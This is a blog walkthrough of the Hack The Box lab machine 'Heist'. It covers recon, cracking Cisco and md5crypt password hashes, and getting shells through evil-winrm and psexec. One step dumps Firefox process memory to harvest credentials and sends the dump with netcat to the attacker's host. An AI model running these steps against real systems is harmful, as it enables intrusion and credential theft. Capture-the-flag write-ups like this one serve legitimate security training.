HTB: Heist

Details

This machine is Heist from Hack The Box

Recon

First a service discovery scan

root@kali:~# nmap -sV -p- 10.10.10.149
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-17 11:44 EDT
Nmap scan report for 10.10.10.149
Host is up (0.044s latency).
Not shown: 65530 filtered ports
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 210.06 seconds

User

Onto smb it is

root@kali:~# smbmap -H 10.10.10.149 -u Anonymous
[+] Finding open SMB ports....
[!] Authentication error occured
[!] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

No smb access, so onto port 80 http://10.10.10.149

Screenshot 1

I clicked login as guest and got sent to http://10.10.10.149/issues.php

Screenshot 2

The attachment was http://10.10.10.149/attachments/config.txt

Screenshot 3

username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408

Also a username of Hazard, I ran it into a cisco password cracked http://www.ifm.net.nz/cookbooks/passwordcracker.html for the bottom two

rout3r:$uperP@ssword
admin:Q4)sJu\Y8qz*A3?d

The other hash

enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91

I set john on it

root@kali:~# john crack --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
stealth1agent    (?)
1g 0:00:00:12 DONE (2019-10-17 12:03) 0.07855g/s 275375p/s 275375c/s 275375C/s stealthy001..ste88dup
Use the "--show" option to display all of the cracked passwords reliably
Session completed

I'll try

Hazard:stealth1agent

On smb

root@kali:~# smbmap -H 10.10.10.149 -u Hazard -p stealth1agent
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.149...
[+] IP: 10.10.10.149:445  Name: 10.10.10.149
  Disk                                                    Permissions
  ----                                                    -----------
  ADMIN$                                              NO ACCESS
  C$                                                  NO ACCESS
  IPC$                                                READ ONLY

Took a look at IPC

root@kali:~# smbclient //10.10.10.149/IPC$ -U Hazard
Enter WORKGROUP\Hazard's password:
Try "help" to get a list of possible commands.
smb: \>

Time to look

smb: \> ls
NT_STATUS_INVALID_INFO_CLASS listing \*

I moved on again, this time looking at port 5985, https://github.com/Hackplayers/evil-winrm is a script for this

root@kali:~# ./evil-winrm.rb -i 10.10.10.149 -u Hazard -p stealth1agent

Info: Starting Evil-WinRM shell v1.7

Info: Establishing connection to remote endpoint

Error: Can't establish connection. Check connection params

Error: Exiting with code 1

So auth fail, I tried enumming with the creds I have + smb

root@kali:~# /usr/share/doc/python-impacket/examples/lookupsid.py [email protected]
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

Password:
[*] Brute forcing SIDs at 10.10.10.149
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

So other users are

Chase
Jason

Try these on winrm with the various password until

root@kali:~# ./evil-winrm.rb -i 10.10.10.149 -u Chase -p 'Q4)sJu\Y8qz*A3?d'

Info: Starting Evil-WinRM shell v1.7

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents>

This gave me a shell, time to dig

*Evil-WinRM* PS C:\Users\Chase\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Chase\Desktop> dir

    Directory: C:\Users\Chase\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/22/2019   9:08 AM            121 todo.txt
-a----        4/22/2019   9:07 AM             32 user.txt

A file and my flag

*Evil-WinRM* PS C:\Users\Chase\Desktop> type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

Done:
1. Restricted access for guest user.

*Evil-WinRM* PS C:\Users\Chase\Desktop> type user.txt
[REDACTED]

System

I found firefox was installed, so to make the rest of this easier I moved nc over by serving it up with a SimpleHTTPServer

*Evil-WinRM* PS C:\tmp> Invoke-WebRequest -URI http://10.10.14.23/nc.exe -OutFile C:\tmp\nc.exe

And did some enum

*Evil-WinRM* PS C:\Users\Chase\Documents> Get-Process
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
[SNIP]
   1144      71   140872     179640      29.55   6316   1 firefox
    341      19    10016      37464       0.66   6440   1 firefox
    408      31    17484      63300       2.45   6692   1 firefox
    390      32    44192      75952      55.09   6996   1 firefox
    358      25    16236      37680       0.80   7156   1 firefox  

Firefox is actually still open, using a fair amount of resources. So it may be worth dumping the process and seeing if there are any creds in memory, so I grabbed a copy of procdump and transferred it with my SimpleHTTPServer

*Evil-WinRM* PS C:\tmp> Invoke-WebRequest -URI http://10.10.14.23/procdump64.exe -OutFile C:\tmp\procdump64.exe

I dumped the process that was using the most CPU resources

*Evil-WinRM* PS C:\tmp> .\procdump64.exe /accepteula -ma 6996 firedump.dmp

ProcDump v9.0 - Sysinternals process dump utility
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[01:20:47] Dump 1 initiated: C:\tmp\firedump.dmp
[01:20:47] Dump 1 writing: Estimated dump file size is 311 MB.
[01:20:48] Dump 1 complete: 311 MB written in 1.0 seconds
[01:20:48] Dump count reached.

And moved the result

root@kali:~# nc -nvlp 4444 > firefox1.dmp
*Evil-WinRM* PS C:\tmp> cmd /r ".\nc.exe 10.10.14.23 4444 < firedump.dmp"

I then grabbed for passwords

root@kali:~# strings firefox1.dmp | grep "password="
            label-password="&fillPasswordMenu.label;"
            accesskey-password="&fillPasswordMenu.accesskey;"
            label-password="&fillPasswordMenu.label;"
            accesskey-password="&fillPasswordMenu.accesskey;"
            label-password="&fillPasswordMenu.label;"
            accesskey-password="&fillPasswordMenu.accesskey;"
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/[email protected]&login_password=4dD!5}x/re8]FBuZ&login=
RG_1=localhost/[email protected]&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/[email protected]&login_password=4dD!5}x/re8]FBuZ&login=

So username and password

[email protected] : 4dD!5}x/re8]FBuZ

I tried it on PSExecas the admin as winrm is unstable

root@kali:~# /usr/share/doc/python-impacket/examples/psexec.py [email protected]
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.149.....
[*] Found writable share ADMIN$
[*] Uploading file bwErrqnm.exe
[*] Opening SVCManager on 10.10.10.149.....
[*] Creating service IYWo on 10.10.10.149.....
[*] Starting service IYWo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

It seemed to have worked

C:\Windows\system32>whoami
nt authority\system

Time to grab me a flag

C:\Windows\system32>cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 78E3-E62D

 Directory of C:\Users\Administrator\Desktop

04/22/2019  09:05 AM    <DIR>          .
04/22/2019  09:05 AM    <DIR>          ..
04/22/2019  09:05 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   7,922,630,656 bytes free

C:\Users\Administrator\Desktop>type root.txt
[REDACTED]

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.